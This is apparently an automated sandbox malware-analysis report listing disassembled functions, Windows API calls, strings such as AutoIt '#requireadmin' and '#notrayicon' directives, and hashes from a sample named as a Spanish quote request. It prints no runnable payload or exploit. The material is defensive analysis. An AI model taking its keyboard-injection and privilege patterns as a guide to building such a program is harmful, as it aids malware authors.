Function 00294653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00294705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00294713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0029471A

Strings

msctls_updown32, xrefs: 00294684

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 3eb513a444b6e6812c423c2a1b6bec89f81367aded4f6a2564bd703f19b4e4e6
Instruction ID: df32a5a1768f35144a07c739f6a39f14dfc7a305ad395abbb88e5a0ded7046ec
Opcode Fuzzy Hash: 3eb513a444b6e6812c423c2a1b6bec89f81367aded4f6a2564bd703f19b4e4e6
Instruction Fuzzy Hash: 372162B5610209AFDB10DF64DCD5DB777ADEB5A394B140059FA0097251DB70EC22CA60

Function 002695AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0026961D

Strings

#requireadmin, xrefs: 002695D9
#notrayicon, xrefs: 002695B7
#OnAutoItStartRegister, xrefs: 002695F3

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 137463da6ea9c78704040203156f3b7ba2381161794e468cfa32c419c3febc96
Instruction ID: b03eda3bd802084679ea2687ab2a8570c3e46ad985830a8155ff1aefca325b50
Opcode Fuzzy Hash: 137463da6ea9c78704040203156f3b7ba2381161794e468cfa32c419c3febc96
Instruction Fuzzy Hash: 68212672234622A6C731AE28D802FB7739C9F65304F54402AFA4A97081EFB1ADF5C695

Function 002937B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00293840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00293850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00293876

Strings

Listbox, xrefs: 0029380F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 556b1ea5109fe9d21465937d11eb0f4d3025feb2adc04d45969050de3a5f7829
Instruction ID: 68cf5ff37506a9727b5359b255c56014fcb915cdb4fc3999945cebaf0f8d26ac
Opcode Fuzzy Hash: 556b1ea5109fe9d21465937d11eb0f4d3025feb2adc04d45969050de3a5f7829
Instruction Fuzzy Hash: C9217F72620219BBEF21CE94DC45EAB776EEF89754F108125F9059B190C6719C618BA0

Function 002749F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00274A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00274A5C
SetErrorMode.KERNEL32(00000000,?,?,0029CC08), ref: 00274AD0

Strings

%lu, xrefs: 00274A6F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: a790d8e468227d42e7e1feb55aff2d11270c89d41129b03f8ba58e4952c804d7
Instruction ID: de03c87b5295ea0826f9331809643a962a02e51f8c22901a86c676fef676582d
Opcode Fuzzy Hash: a790d8e468227d42e7e1feb55aff2d11270c89d41129b03f8ba58e4952c804d7
Instruction Fuzzy Hash: BC316F75A10209AFDB10DF54C885EAA7BF8EF08308F1480A9F909DB252D771EE95CF61

Function 002941EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0029424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00294264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00294271

Strings

msctls_trackbar32, xrefs: 00294226

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 76137a1acb38b689b8bce8bec6242c896cfc8cce013dba785e0f4a849b46939e
Instruction ID: e16bbc7fadadea7f8770e27f3a0c6a02674ef6c606ace171508a1819cee1cd05
Opcode Fuzzy Hash: 76137a1acb38b689b8bce8bec6242c896cfc8cce013dba785e0f4a849b46939e
Instruction Fuzzy Hash: 01110632650208BEEF206F29CC06FAB3BACFF85B54F110524FA55E2090D271DC729B20

Function 00262F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00206B57: _wcslen.LIBCMT ref: 00206B6A

Part of subcall function 00262DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00262DC5
Part of subcall function 00262DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00262DD6
Part of subcall function 00262DA7: GetCurrentThreadId.KERNEL32 ref: 00262DDD
Part of subcall function 00262DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00262DE4

GetFocus.USER32 ref: 00262F78

Part of subcall function 00262DEE: GetParent.USER32(00000000), ref: 00262DF9

GetClassNameW.USER32(?,?,00000100), ref: 00262FC3
EnumChildWindows.USER32(?,0026303B), ref: 00262FEB

Strings

%s%d, xrefs: 00262FFF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: afcd9a6c239dbe888d13278250b77d56e7e4f435edb87b624f91148de9cb4658
Instruction ID: e3fef57a7ea389a6bfac9d55761aeaf8d4f475ec69225a52faf9f7b617ba2ba8
Opcode Fuzzy Hash: afcd9a6c239dbe888d13278250b77d56e7e4f435edb87b624f91148de9cb4658
Instruction Fuzzy Hash: 3D11B4B5610205ABDF14BF70DC89FED376AAF94304F144075F909AB192DE709AA98F70

Function 00295882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002958C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002958EE
DrawMenuBar.USER32(?), ref: 002958FD

Strings

0, xrefs: 0029588F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 06f1fd04980055fba1d0faff5552671c73f482ef6752deb572faf0a97266cc46
Instruction ID: d121789f671b7a7cf230b8876c64d1ef9036c7b675ddbe093d47e95f834979ff
Opcode Fuzzy Hash: 06f1fd04980055fba1d0faff5552671c73f482ef6752deb572faf0a97266cc46
Instruction Fuzzy Hash: 1E018431620228EFEF519F11DC44BEEBBB4FF45760F108099E849D6151DB708AA4DF61

Function 0026007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d81d379af5638bea3478ec5bc93c2cc74b021e0d464ab6fb8fba9af3df8da691
Instruction ID: 72c8df95641bb7c449b6eee2ea31c3768200c5eb320a28ae8ae560e068571563
Opcode Fuzzy Hash: d81d379af5638bea3478ec5bc93c2cc74b021e0d464ab6fb8fba9af3df8da691
Instruction Fuzzy Hash: E7C15C75A10206EFDB14CFA4C898BAEB7B5FF48304F208598E905EB251D771ED91DB90

Function 0028342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00283459
CoUninitialize.OLE32 ref: 00283463
VariantInit.OLEAUT32(?), ref: 0028346E
VariantClear.OLEAUT32(?), ref: 0028371B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 77edf676b45b06deb88d599e9e3e0bc7c0485fe0364c8bd071c3df7d81f43efc
Instruction ID: c55f1fb121c589cdb73be1e5b351d1af92eb9b7a1bdd9dcb13ed9218738e2e17
Opcode Fuzzy Hash: 77edf676b45b06deb88d599e9e3e0bc7c0485fe0364c8bd071c3df7d81f43efc
Instruction Fuzzy Hash: 47A14C796243119FC700EF28C885A6ABBE5FF88714F148859F9499B3A2DB30EE51CF51

Function 00260436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0029FC08,?), ref: 002605F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0029FC08,?), ref: 00260608
CLSIDFromProgID.OLE32(?,?,00000000,0029CC40,000000FF,?,00000000,00000800,00000000,?,0029FC08,?), ref: 0026062D
_memcmp.LIBVCRUNTIME ref: 0026064E

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: fa508c1fd3a5223118b04ca83d17c638e6e3f2d14322b759b4527ec49f3554c1
Instruction ID: 3923e265bd2364efd55e3aef47e3903edc3b2c2575200cb2003d71ba6ae970f8
Opcode Fuzzy Hash: fa508c1fd3a5223118b04ca83d17c638e6e3f2d14322b759b4527ec49f3554c1
Instruction Fuzzy Hash: 85814C71A10209EFCB04DF94C984EEEB7B9FF89315F204558E506AB250DB71AE56CF60

Function 00241391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002414C0

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6d2c7bb74a588ea676d92b22bba6ee2d58865981c3e58beca2011844ab32cb9e
Instruction ID: c3a6086dfe949f45cd2ab9903357572993b3fd8af9b408dc79ca0b8cbba0210f
Opcode Fuzzy Hash: 6d2c7bb74a588ea676d92b22bba6ee2d58865981c3e58beca2011844ab32cb9e
Instruction Fuzzy Hash: 90417F71A30111ABDB297FF8AC466BE3AB4EF42370F240266F819D6191E77448F15A71

Function 00296278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0157EAC0,?), ref: 002962E2
ScreenToClient.USER32(?,?), ref: 00296315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00296382

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 0d157ebada33a26220dcee714c1f3871e294c1966c71f07a6cf74decbee30850
Instruction ID: 3e8403220b1184dbc9686154a2feeb6956cdff38fe21c0da8dfd1bf5f01640d8
Opcode Fuzzy Hash: 0d157ebada33a26220dcee714c1f3871e294c1966c71f07a6cf74decbee30850
Instruction Fuzzy Hash: 48513C7491020AAFDF14DF64D8889AE7BF5EF45760F1081AAF81597290D730EDA1CB50

Function 00281AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00281AFD
WSAGetLastError.WSOCK32 ref: 00281B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00281B8A
WSAGetLastError.WSOCK32 ref: 00281B94

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 0b8f10a7036789a10b4554b259e8378a55002eb23488e2f24ca87e6fa4099fde
Instruction ID: 72560653ba590221a7f9f2c4a58f8f0957267435a79a2bf0f123d623736997bb
Opcode Fuzzy Hash: 0b8f10a7036789a10b4554b259e8378a55002eb23488e2f24ca87e6fa4099fde
Instruction Fuzzy Hash: C241F4786103016FE720AF24C88AF6577E5AB44718F548448F91A9F3D3D772EDA2CB90

Function 0023B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc21713dd33936da7403b8987acfd15c91df97bf375b9b15351a64fa7f41bb1d
Instruction ID: cc6a6699caccb3d534cb872ebb201a7bd4caf1b9f28ee5c52d1e42c76186daeb
Opcode Fuzzy Hash: fc21713dd33936da7403b8987acfd15c91df97bf375b9b15351a64fa7f41bb1d
Instruction Fuzzy Hash: 6D412BB6A20314BFD7259F78CC51B6ABBF9EB88710F10452EF641DB281D77199618B80

Function 002756D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00275783
GetLastError.KERNEL32(?,00000000), ref: 002757A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002757CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002757FA

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: ec44cbe0b4d1f4fe084fa30b300f807f54527c1e6d8b3c60a33480133676c4d4
Instruction ID: b4f1062eebcabc105ee8efa0bbba4303f61c43baacb2ccf782640a005f0f2381
Opcode Fuzzy Hash: ec44cbe0b4d1f4fe084fa30b300f807f54527c1e6d8b3c60a33480133676c4d4
Instruction Fuzzy Hash: 3B410839610611DFCB11EF15C544A5ABBE2AF89320B59C489EC4AAB3A2CB74FD50CF91

Function 0023D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00226D71,00000000,00000000,002282D9,?,002282D9,?,00000001,00226D71,?,00000001,002282D9,002282D9), ref: 0023D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0023D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0023D9AB
__freea.LIBCMT ref: 0023D9B4

Part of subcall function 00233820: RtlAllocateHeap.NTDLL(00000000,?,002D1444,?,0021FDF5,?,?,0020A976,00000010,002D1440,002013FC,?,002013C6,?,00201129), ref: 00233852

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: afdfb857c98e580dfc8d806953e5cf6bf57031d37f2725d3c56596c211fb91ea
Instruction ID: 700b49650160d7f36e94fca4f1aae9bdedc3ad7366a03dc8db94583fce4bb94e
Opcode Fuzzy Hash: afdfb857c98e580dfc8d806953e5cf6bf57031d37f2725d3c56596c211fb91ea
Instruction Fuzzy Hash: C331F0B2A2021AABDF25DF64EC45EAE7BA5EF40310F150169FC04D7250EB35CD60CBA0

Function 002952C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00295352
GetWindowLongW.USER32(?,000000F0), ref: 00295375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00295382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002953A8

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 251ce5690f4cf9b520dd7a16d3041c6695884ec59188434b257aed9c742253a2
Instruction ID: 60fdfb1a6ad7b9744293e714709d29831a7f96951afae6648457480174727e32
Opcode Fuzzy Hash: 251ce5690f4cf9b520dd7a16d3041c6695884ec59188434b257aed9c742253a2
Instruction Fuzzy Hash: F7310330B75A29FFEF369E14DC19BE83765AB04390F584182FA00961E1C3F09DA09B49

Function 0026AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0026ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0026AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0026AC74
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0026ACC6

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
